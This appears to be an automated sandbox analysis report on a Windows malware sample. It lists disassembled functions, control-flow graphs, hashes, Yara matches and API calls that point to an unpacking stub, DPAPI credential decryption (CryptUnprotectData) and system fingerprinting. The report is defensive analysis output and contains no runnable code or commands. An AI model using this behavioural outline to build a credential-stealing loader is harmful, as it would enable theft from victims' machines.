                                                              control_flow_graph 507 409960-409973 508 409975-409981 507->508 509 4099c7-4099c9 507->509 511 409983-409985 508->511 512 4099ce-4099db 508->512 510 40a0c9-40a0d2 509->510 514 409987-4099c5 511->514 515 4099dd-4099e4 511->515 513 409a12-409aa1 call 4067b0 call 4336f0 call 435440 512->513 524 409aa3 513->524 525 409ae8-409b42 call 4091c0 513->525 516 4099e6-4099fb 514->516 515->516 517 4099fd-409a0d 515->517 516->513 517->513 526 409ab0-409ae6 524->526 529 409b44 525->529 530 409b96-409bfa call 4091c0 525->530 526->525 526->526 531 409b50-409b94 529->531 534 409c30-409c8a call 4091c0 530->534 535 409bfc-409bff 530->535 531->530 531->531 539 409cbb-409d07 534->539 540 409c8c-409c8f 534->540 536 409c00-409c2e 535->536 536->534 536->536 542 409d09 539->542 543 409d4d-409db2 call 4091c0 539->543 541 409c90-409cb9 540->541 541->539 541->541 545 409d10-409d4b 542->545 547 409db4 543->547 548 409df8-409faf call 409480 543->548 545->543 545->545 549 409dc0-409df6 547->549 552 409fb1 548->552 553 40a002-40a048 548->553 549->548 549->549 554 409fc0-40a000 552->554 555 40a094-40a0b4 call 40d380 call 4087a0 553->555 556 40a04a 553->556 554->553 554->554 561 40a0b9-40a0c2 555->561 557 40a050-40a092 556->557 557->555 557->557 561->510
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$01$ZR\;$[hct${hmn
                                                              • API String ID: 0-1484469362
                                                              • Opcode ID: 9addd3b863d326590257d70592a47e247d8e9e76fabce0ec909f09bc427e5ad8
                                                              • Instruction ID: 48ecf83dcb48e748d01dfa638aea1d50d8185787a1297f3da60f3c5648012799
                                                              • Opcode Fuzzy Hash: 9addd3b863d326590257d70592a47e247d8e9e76fabce0ec909f09bc427e5ad8
                                                              • Instruction Fuzzy Hash: 971202B02083818BE724CF15C4A476FBBE1BBC6348F144D2DE5D58B292D77AD809CB96
                                                              Function 0041537E Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 232encryptionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041564F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: CryptDataUnprotect
                                                              • String ID: .$=
                                                              • API String ID: 834300711-1678909263
                                                              • Opcode ID: 183ef4c1313d8aee56ada1eed8e8f16050662da6e108a753712437f4e389a81a
                                                              • Instruction ID: 1ba618c7c74fca3a6dab2d59277d8eb37d046adcbf7b7a58cf2c090dca870eab
                                                              • Opcode Fuzzy Hash: 183ef4c1313d8aee56ada1eed8e8f16050662da6e108a753712437f4e389a81a
                                                              • Instruction Fuzzy Hash: 9481D5B1508740CFD724CF29C49179BBBE2AFD6308F184A2EE1A58B392D739D945CB46
                                                              Function 00404970 Relevance: 2.9, Strings: 2, Instructions: 408COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: )$IEND
                                                              • API String ID: 0-707183367
                                                              • Opcode ID: e7903be39d4e34c9f5b2804a62402e159c365d2c7a7c9331be733edcae7195fd
                                                              • Instruction ID: 05b6572399bca2268092eb3df2821dc4a125dc7a7576062249b5a2d5c26daba1
                                                              • Opcode Fuzzy Hash: e7903be39d4e34c9f5b2804a62402e159c365d2c7a7c9331be733edcae7195fd
                                                              • Instruction Fuzzy Hash: 4CE1B1B2A083449BD714CF28D88175B7BE5ABD4314F14853EFA95AB3C1D778E904CB8A
                                                              Function 00420880 Relevance: 2.9, Strings: 2, Instructions: 390COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: ]hiX$gdeb
                                                              • API String ID: 2994545307-4273025081
                                                              • Opcode ID: 7fbaa0d25f5ecf0750f065394b18b78656d35acff2d5509d26a22e1454e3b5db
                                                              • Instruction ID: 336b67656a256fc3d7c49e2fee8c29aa2d9fc5d5d61a2c4a19b8c8911d00a2fb
                                                              • Opcode Fuzzy Hash: 7fbaa0d25f5ecf0750f065394b18b78656d35acff2d5509d26a22e1454e3b5db
                                                              • Instruction Fuzzy Hash: B6C1E3B17083118FD714CF15D89172BBBE1EBD5318FA48A2EE4959B382D738D845CB8A
                                                              Function 004168EF Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: IO
                                                              • API String ID: 0-3981347273
                                                              • Opcode ID: 29fb27968318ae9cb900c6618a64d07fe03029c203b194ad627e1d93fc6363e6
                                                              • Instruction ID: 51fd4917a3c3351c2bbf2a3dc6b6b13a62bcc2487d4881d1c48f1649ea521d72
                                                              • Opcode Fuzzy Hash: 29fb27968318ae9cb900c6618a64d07fe03029c203b194ad627e1d93fc6363e6
                                                              • Instruction Fuzzy Hash: 94D132B1200B018BD724CF15C590B52BBF2FF4A704F158A9DD89A8FB56D739E985CB88
                                                              Function 00415FE1 Relevance: .1, Instructions: 112COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a5d886a9cf1d364aeba75cbb5fbc2a0112e377b092f9423ae5a3a5703b18e045
                                                              • Instruction ID: 02b8bb6e56041378f4f9f2711353cce18edc58b923ed8b10765db063976cd2a1
                                                              • Opcode Fuzzy Hash: a5d886a9cf1d364aeba75cbb5fbc2a0112e377b092f9423ae5a3a5703b18e045
                                                              • Instruction Fuzzy Hash: EA41BD745083528BC724CF14C8617ABB7E1FF89358F054A1DE9DA9B381E7389985CB8A
                                                              Function 0042B20E Relevance: .0, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6267cfd9be4afba129147b6b4996751238124f7394fccf3144a8ff5b67e9c5bc
                                                              • Instruction ID: 151cf318142fe4857ebf8dfdf36c3425f9736b69a2a980a3f824acb8caea4c7c
                                                              • Opcode Fuzzy Hash: 6267cfd9be4afba129147b6b4996751238124f7394fccf3144a8ff5b67e9c5bc
                                                              • Instruction Fuzzy Hash: 36F039B45093418FC320EF25D55474ABBE1ABD8304F01882DE489C7391DBB99858CF86
                                                              Function 0212003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 26 212003c-2120047 27 2120049 26->27 28 212004c-2120263 call 2120a3f call 2120e0f call 2120d90 VirtualAlloc 26->28 30 212004a 27->30 44 2120265-2120289 call 2120a69 28->44 45 212028b-2120292 28->45 30->30 49 21202ce-21203c2 VirtualProtect call 2120cce call 2120ce7 44->49 46 21202a1-21202b0 45->46 48 21202b2-21202cc 46->48 46->49 48->46 56 21203d1-21203e0 49->56 57 21203e2-2120437 call 2120ce7 56->57 58 2120439-21204b8 VirtualFree 56->58 57->56 60 21205f4-21205fe 58->60 61 21204be-21204cd 58->61 62 2120604-212060d 60->62 63 212077f-2120789 60->63 65 21204d3-21204dd 61->65 62->63 67 2120613-2120637 62->67 69 21207a6-21207b0 63->69 70 212078b-21207a3 63->70 65->60 66 21204e3-2120505 LoadLibraryA 65->66 71 2120517-2120520 66->71 72 2120507-2120515 66->72 75 212063e-2120648 67->75 73 21207b6-21207cb 69->73 74 212086e-21208be LoadLibraryA 69->74 70->69 76 2120526-2120547 71->76 72->76 77 21207d2-21207d5 73->77 83 21208c7-21208f9 74->83 75->63 78 212064e-212065a 75->78 81 212054d-2120550 76->81 79 21207d7-21207e0 77->79 80 2120824-2120833 77->80 78->63 82 2120660-212066a 78->82 86 21207e2 79->86 87 21207e4-2120822 79->87 91 2120839-212083c 80->91 88 21205e0-21205ef 81->88 89 2120556-212056b 81->89 90 212067a-2120689 82->90 84 2120902-212091d 83->84 85 21208fb-2120901 83->85 85->84 86->80 87->77 88->65 92 212056f-212057a 89->92 93 212056d 89->93 94 2120750-212077a 90->94 95 212068f-21206b2 90->95 91->74 96 212083e-2120847 91->96 98 212059b-21205bb 92->98 99 212057c-2120599 92->99 93->88 94->75 100 21206b4-21206ed 95->100 101 21206ef-21206fc 95->101 102 212084b-212086c 96->102 103 2120849 96->103 110 21205bd-21205db 98->110 99->110 100->101 104 212074b 101->104 105 21206fe-2120748 101->105 102->91 103->74 104->90 105->104 110->81
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0212024D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: cess$kernel32.dll
                                                              • API String ID: 4275171209-1230238691
                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction ID: 6307871ac7b424446d8f48e480cf3fe90682051c211dfdc8c527356dcb06ef3a
                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction Fuzzy Hash: 61526A74A01229DFDB64CF58C984BACBBB1BF09304F1581D9E54DAB351DB30AA99CF14
                                                              Function 0041CFA0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 200COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 307 41cfa0-41d014 308 41d016 307->308 309 41d069-41d0ac RtlExpandEnvironmentStrings 307->309 310 41d020-41d067 308->310 311 41d0b5 309->311 312 41d0ae-41d0b3 309->312 310->309 310->310 313 41d0b8-41d139 call 435440 RtlExpandEnvironmentStrings 311->313 312->313 316 41d189-41d1b6 313->316 317 41d13b 313->317 319 41d1b8-41d1bd 316->319 320 41d1bf-41d1c1 316->320 318 41d140-41d187 317->318 318->316 318->318 321 41d1c4-41d1db call 435440 319->321 320->321 324 41d201-41d211 321->324 325 41d1dd-41d1e6 321->325 327 41d231-41d242 call 43a250 324->327 328 41d213-41d21a 324->328 326 41d1f0-41d1ff 325->326 326->324 326->326 331 41d247-41d263 327->331 329 41d220-41d22f 328->329 329->327 329->329
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041D0A0
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041D0CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: K-K/$U5U7$\1B3
                                                              • API String ID: 237503144-1235027928
                                                              • Opcode ID: c674b7651ea3e55e9227b54ef7b57f94361ab8414c6d31006c9343337da9bb58
                                                              • Instruction ID: 085b80d8ebaf4cdc089f22804327f41de0cf31be30b47905784d4d41386d2044
                                                              • Opcode Fuzzy Hash: c674b7651ea3e55e9227b54ef7b57f94361ab8414c6d31006c9343337da9bb58
                                                              • Instruction Fuzzy Hash: F76177B56083518FD324CF14C8A0BABB7E1EF8A308F054A1DE8E65B381D7749945CBA7
                                                              Function 0041D8E0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 380 41d8e0-41d993 381 41d9d5-41da15 RtlExpandEnvironmentStrings 380->381 382 41d995 380->382 384 41da17-41da1c 381->384 385 41da1e 381->385 383 41d9a0-41d9d3 382->383 383->381 383->383 386 41da21-41da9f call 435440 RtlExpandEnvironmentStrings 384->386 385->386 389 41dae1-41daea call 417a30 386->389 390 41daa1 386->390 393 41daef-41daf2 389->393 391 41dab0-41dadf 390->391 391->389 391->391
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041DA0A
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0041DA3A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: eI.K$qs
                                                              • API String ID: 237503144-3936219367
                                                              • Opcode ID: 85c26f031341337586e1b5fec7c34aa25b76f3d64f86288b9f1c02943ea52ba5
                                                              • Instruction ID: 3ad400ec4d5e0868339db15895de8c0dbb191545bfc635c07005ecffac5dc4ed
                                                              • Opcode Fuzzy Hash: 85c26f031341337586e1b5fec7c34aa25b76f3d64f86288b9f1c02943ea52ba5
                                                              • Instruction Fuzzy Hash: 915154B0100B009BD724CF26C890BA7BBB5FF46314F544A1CE8A64BB89D774F549CB98
                                                              Function 00408EA0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 394 408ea0-408ead call 436950 397 408eb1-408eb8 call 431710 394->397 398 408eaf 394->398 402 408eba 397->402 403 408ebc-408ef7 GetStdHandle GetConsoleWindow call 408f20 call 40a390 397->403 399 408f0b-408f14 ExitProcess 398->399 404 408f04-408f09 call 4371d0 402->404 411 408ef9 403->411 412 408efb call 40f5b0 403->412 404->399 413 408f02 411->413 415 408f00 412->415 413->404 415->413
                                                              APIs
                                                              Strings
                                                              • of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in, xrefs: 00408EDE
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID: of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in
                                                              • API String ID: 621844428-2804141084
                                                              • Opcode ID: d3fc2cdc024533b6e08ef3c83f20ae28995cdbdfa2716207c1ee4e745a0791f4
                                                              • Instruction ID: 4cc74d5fb66ad9159a78e8348017eb50dff1af742bc963a264908d0417922e34
                                                              • Opcode Fuzzy Hash: d3fc2cdc024533b6e08ef3c83f20ae28995cdbdfa2716207c1ee4e745a0791f4
                                                              • Instruction Fuzzy Hash: A5F0FFB0408202CEC750BF72D70626A7BA5AF64364F10593FEAD5A12D1EE3C84459E5F
                                                              Function 004337FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 416 4337fd-43385d call 439500 GetVolumeInformationW
                                                              APIs
                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00433840
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: InformationVolume
                                                              • String ID: :$C$\
                                                              • API String ID: 2039140958-3809124531
                                                              • Opcode ID: cbbe94e1d607de42a8e897c5ed6c7dfebdb6e6a87b75144c6ad5122602fa5c3d
                                                              • Instruction ID: 1368c0940c647f4f39a91e564e44146e6a68535283266bc39cb5798660f285bc
                                                              • Opcode Fuzzy Hash: cbbe94e1d607de42a8e897c5ed6c7dfebdb6e6a87b75144c6ad5122602fa5c3d
                                                              • Instruction Fuzzy Hash: 44F06575294701B7E718DF10EC56F1A32E0EB81B44F10482DB245AA1D0D7F5AA19DA5E
                                                              Function 0042B5E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: AllocString
                                                              • String ID: *$,
                                                              • API String ID: 2525500382-162240353
                                                              • Opcode ID: 6f887dd92c1e7d051b441eb50b8ce683dfa68637c71dffcb6e4b95598e80c62e
                                                              • Instruction ID: 8755544d7d26afcd6c5da590c34bf048d679cfec69adbb61e5b4e032c319a10d
                                                              • Opcode Fuzzy Hash: 6f887dd92c1e7d051b441eb50b8ce683dfa68637c71dffcb6e4b95598e80c62e
                                                              • Instruction Fuzzy Hash: 2641C27450D7C18ED371CB28845C78BBFE0AB9A324F148A4DE0E94B2E2CB74510ADB97
                                                              Function 004283B9 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 386COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042893E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: InstalledMemoryPhysicallySystem
                                                              • String ID: sflQ
                                                              • API String ID: 3960555810-3249545781
                                                              • Opcode ID: 8302543d336a64d61fbfd091ffaf374d6ea3bc29c3405159477e15a25cf067dc
                                                              • Instruction ID: ceaf3b536834eb6ea101402e43ebfa27eafed5b2e0152b17aac62569a04a8eaf
                                                              • Opcode Fuzzy Hash: 8302543d336a64d61fbfd091ffaf374d6ea3bc29c3405159477e15a25cf067dc
                                                              • Instruction Fuzzy Hash: 42E16F70205B918AD7258F39C4A47E7BBE1BF16305F98499EC0EB8B382DB396409CB55
                                                              Function 0042880F Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 322COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042893E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: InstalledMemoryPhysicallySystem
                                                              • String ID: sflQ
                                                              • API String ID: 3960555810-3249545781
                                                              • Opcode ID: eda0b82203ec5fd52a02e42ad8bc985fa3b6130ce1cc9c57a209a743f85e5ba8
                                                              • Instruction ID: 4579460111167dd6f514478598ab714a340966e7b3f1678d87b811800d9ff980
                                                              • Opcode Fuzzy Hash: eda0b82203ec5fd52a02e42ad8bc985fa3b6130ce1cc9c57a209a743f85e5ba8
                                                              • Instruction Fuzzy Hash: A7C17F70205B918AD725CF35C4A07E7BBE1BF16304F98495ED0EB8B382DB796409CB55
                                                              Function 0043551D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004355C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: \-"#
                                                              • API String ID: 3298025750-2514456039
                                                              • Opcode ID: 859eba75cc14126060daa5553d4e99eea4a1c63d27fd1e683f7c5ac40af54193
                                                              • Instruction ID: 4e5805d71c6b113a9038e1d4705d07e5b3b04c5f079926af7e5af699945cb8d6
                                                              • Opcode Fuzzy Hash: 859eba75cc14126060daa5553d4e99eea4a1c63d27fd1e683f7c5ac40af54193
                                                              • Instruction Fuzzy Hash: 5A1151716083019FD708CF50D8A475FFBE2FBC4328F148A1DE4A917691C3B99909CB86
                                                              Function 00414EC0 Relevance: 3.2, APIs: 2, Instructions: 181COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00414EFA
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00414F28
                                                                • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 3432729115-0
                                                              • Opcode ID: c009db615c638526771df0e05fb3056c90e96922816314dcb6ffecc14510497f
                                                              • Instruction ID: 3bef7b545c1fe862b70271ecfb8295d17d8257d1e606da934cadffb5b9659bed
                                                              • Opcode Fuzzy Hash: c009db615c638526771df0e05fb3056c90e96922816314dcb6ffecc14510497f
                                                              • Instruction Fuzzy Hash: C351E0B41043018BD324CF14C891BABBBE5FFC5718F048A1DF9A69B391EB789941CB96
                                                              Function 00417A30 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00417A6A
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00417A98
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID:
                                                              • API String ID: 237503144-0
                                                              • Opcode ID: 76c95b86170c2d249fc8a0b579228b811743fa26dcd10391b77df605b8ccdfce
                                                              • Instruction ID: 9d185849e125c65ed9e76077d369fe8678050950fd45e526c791e55ee9a7ec59
                                                              • Opcode Fuzzy Hash: 76c95b86170c2d249fc8a0b579228b811743fa26dcd10391b77df605b8ccdfce
                                                              • Instruction Fuzzy Hash: 0F01D2755482047FD310AB25CC86F67776CEB86764F044619F9668B2D1EB30A908C6B6
                                                              Function 0079E1D6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0079E1FE
                                                              • Module32First.KERNEL32(00000000,00000224), ref: 0079E21E
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152378881.000000000079D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0079D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_79d000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 3833638111-0
                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction ID: e05eff74c5ec469af8c6dc2a67fcc4750633d0a98a5ce3e00c41762c0c07bc40
                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction Fuzzy Hash: 58F062312007156BDB20BBB5BC8DA6E76EDFF59725F100528E642950C0DA78ED454661
                                                              Function 02120E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00000400,?,?,02120223,?,?), ref: 02120E19
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,02120223,?,?), ref: 02120E1E
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction ID: 44aadaba4ceec3c7039f90236b980d150b62195d6aed535f06090d2979b601d5
                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction Fuzzy Hash: 68D012311451287BD7002A94DC09BCD7B1CDF09B66F108011FB0DD9080C770954046E5
                                                              Function 00436D86 Relevance: 1.6, APIs: 1, Instructions: 67libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
